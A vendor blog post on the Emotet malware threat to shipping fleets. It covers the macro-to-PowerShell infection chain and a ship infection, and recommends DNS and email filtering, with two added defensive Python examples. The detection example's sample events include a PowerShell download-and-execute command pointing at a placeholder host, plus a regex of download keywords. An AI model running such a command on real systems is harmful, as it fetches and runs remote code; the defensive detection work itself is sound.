The current Emotet malware threat: How can you protect your fleet?
Written by Geir Inge Jensen, CISO | 26 October 2020
Having been dormant since February, the notorious Emotet malware resurged in July. Since August, there has been a 1,000 percent increase in malicious cyber actors targeting industries worldwide with phishing emails.
This makes it one of the biggest cyberattacks ever. And the threat is ongoing. Cyber defences all over the world are struggling to combat this malware.
What are the most effective mitigation measures your shipping company should implement?
Let’s take a closer look at the Emotet malware to identify the best ‘antidote’.
What is Emotet malware?
Emotet is an advanced Trojan commonly functioning as a downloader or dropper of other malware. It primarily spreads via phishing emails that often contain familiar branding, mimicking the email format of well-known and trusted companies such as PayPal or DHL to convince users.
Once clicked, the phishing attachments and links launch the payload. The malware then attempts to proliferate within a network by brute-forcing user credentials and writing to shared drives.
The Emotet malware changes every day.
The Department of Homeland Security referred to Emotet in a 2018 advisory as “among the most costly and destructive malware,” costing on average $1 million per attack to fix.
Dualog cannot stress this enough: Emotet is a clear and present danger for ships. In February 2019, a U.S.-flagged ultra-large container ship bound for New York City was infected with Emotet, destroying its network.
Container ship attack and U.S. Coast Guard warning
According to a sobering Wall Street Journal article, the container ship’s crew reported that their shipboard network had been “totally debilitated” by malware. They were unable to resolve the issue, and neither could the shipping company’s onshore system administrators.
The U.S. Coast Guard contacted the FBI and then sent its own cyber specialists team to assess the damage on board. It turned out the malware had infiltrated the ship’s network “due to an almost total lack of cybersecurity safeguards”.
The 2019 Emotet attack raised concerns about the state of cybersecurity in the commercial maritime shipping industry, prompting the U.S. Coast Guard to issue an alert warning the industry to take basic precautions against cyberattacks.
For maritime shipping companies, the alert states, cybersecurity is as much of a priority as “controlling physical access or performing routine maintenance.”
Emotet’s initial attack vector is either a macro in an attached Word document or a phishing link in the message body. Later revisions of the attack password-protect the document or zip file and trick the receiver into enabling macros for the document.
Once activated, the macro will run a command session that starts PowerShell and then downloads the real Emotet malware from one of five locations. The malware itself is very advanced and will utilise more than 20 attack vectors to spread locally on the infected machine’s network. If any computer on the network is outdated, lacking the latest security patches, it will most likely also be infected. In this regard, Emotet acts as a worm.
In addition to spreading through unpatched security vulnerabilities, Emotet will brute-force passwords of user accounts and, once successful, will read all the Outlook data available. The message bodies are sent back to the botnet and changed slightly before being sent out to all the email addresses found in that Outlook mailbox. These emails will be very similar to real messages, with dates and numbers changed, as well as a slightly modified subject and a random sender address. The emails will most likely have a modified version of the Emotet malware attached, in an effort to bypass virus scanners.
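The Word macro → command session → PowerShell → download chain described above is the behaviour an endpoint detection rule on the vessel's PCs should key on. The following is added example code, not part of the original post or any Dualog product; the process-creation events are constructed Sysmon-style records, and the rule names, severity levels and the four-hop ancestry bound are assumptions.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}   # document viewers that should never spawn shells
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|bitsadmin")

# Constructed Sysmon-style process-creation events (not real telemetry).
EVENTS = [
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 512, "ppid": 400, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "Invoice_8821.doc"'},
    {"pid": 520, "ppid": 512, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -nop -w hidden"},
    {"pid": 531, "ppid": 520, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden (New-Object Net.WebClient).DownloadString('http://example.invalid/d')"},
    {"pid": 600, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Service"},                 # benign admin use, must not alert
]

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def ancestors(ev, by_pid, depth=4):
    """Image names of the parent chain, nearest first (bounded to avoid cycles)."""
    chain, cur = [], ev
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        chain.append(basename(cur["image"]))
    return chain

def detect(events):
    """Return (pid, rule) alerts for the Office -> shell -> download pattern."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        img, parent = basename(ev["image"]), by_pid.get(ev["ppid"])
        if img in SHELLS and parent and basename(parent["image"]) in OFFICE:
            alerts.append((ev["pid"], "office-spawned-shell"))
        if img == "powershell.exe" and DOWNLOAD_RE.search(ev["cmdline"]):
            # Escalate when an Office application sits anywhere in the ancestry.
            sev = "high" if any(a in OFFICE for a in ancestors(ev, by_pid)) else "medium"
            alerts.append((ev["pid"], f"powershell-download:{sev}"))
    return alerts

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The benign `Get-Service` launch from Explorer produces no alert, while the PowerShell download is escalated to high only because WINWORD.EXE is found in its ancestry.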
Effective mitigation measures
Earlier this month, Trickbot – one of the biggest botnets behind Emotet – was taken down by U.S. Cyber Command and a private coalition led by Microsoft. This was believed to be a major setback for the Emotet malware. However, the disruption of Trickbot was short-lived. Last week, it bounced back.
So, is there an effective cure for this malady?
Yes. As the saying goes, prevention is better than cure.
To secure your ships against Emotet malware, implement the following mitigation measures:
As Emotet relies on phishing links and on fetching its payload over the Internet, DNS protection that blocks resolution of known-malicious domains will be very effective. In addition, the C2 traffic sending harvested email messages back to the botnet will be blocked.
Email is the primary Emotet attack vector. To maximise your chances of preventing this mutated virus from reaching the vessel, you will need a robust multilayer email filtering mechanism using multiple virus scanners that are continuously updated.
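One layer of such an email filter can reject the attachment traits this post describes, namely macro-enabled Office documents and password-protected archives that a virus scanner cannot inspect. The code below is an added example, not part of the original post or of Dualog's products; the blocked-extension list is an assumption, and the sample attachments are constructed in memory.

```python
import io
import zipfile

# Assumed gateway policy: script/executable types that have no business arriving by email.
BLOCKED_EXT = {"exe", "js", "vbs", "hta", "scr"}

def classify_attachment(name: str, data: bytes) -> str:
    """Return 'allow' or a 'block: <reason>' verdict for one attachment."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in BLOCKED_EXT:
        return "block: executable script type"
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))   # OOXML documents and .zip are both zip containers
    except zipfile.BadZipFile:
        return "allow"                           # not a zip container; the virus scanners still see it
    # Bit 0 of the general-purpose flag marks an encrypted entry, which the
    # scanner cannot open; that is exactly why phishing lures password-protect it.
    if any(info.flag_bits & 0x1 for info in zf.infolist()):
        return "block: password-protected archive"
    # Word/Excel macros are stored as vbaProject.bin inside the OOXML package.
    if any(n.lower().endswith("vbaproject.bin") for n in zf.namelist()):
        return "block: macro-enabled Office document"
    return "allow"

# --- constructed sample attachments (no real malware involved) ---------------
def make_ooxml(with_macro: bool) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()

def make_encrypted_zip() -> bytes:
    # zipfile cannot write encrypted entries, so build a plain archive and set the
    # encryption flag bit in the local header (offset 6) and central directory (offset 8).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("invoice.doc", b"placeholder")
    data = bytearray(buf.getvalue())
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = data.find(sig)
        while pos != -1:
            data[pos + off] |= 0x01
            pos = data.find(sig, pos + 1)
    return bytes(data)

if __name__ == "__main__":
    for name, data in [("report.docx", make_ooxml(False)), ("invoice.docm", make_ooxml(True)),
                       ("invoice.zip", make_encrypted_zip())]:
        print(name, "->", classify_attachment(name, data))
```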
Read a full threat report on the Emotet malware here. It lists attack techniques used by Emotet, and recommended mitigations.
Geir Inge Jensen is the Chief Information Security Officer at Dualog. Adding over 20 years of experience in network design and cybersecurity, Geir Inge is passionate about developing solutions and services that help shipping companies create a more cyber-resilient environment onboard their vessels. When he is not fighting maritime cybercrime, you can find him in the mountains enjoying the great outdoors with his camera in hand.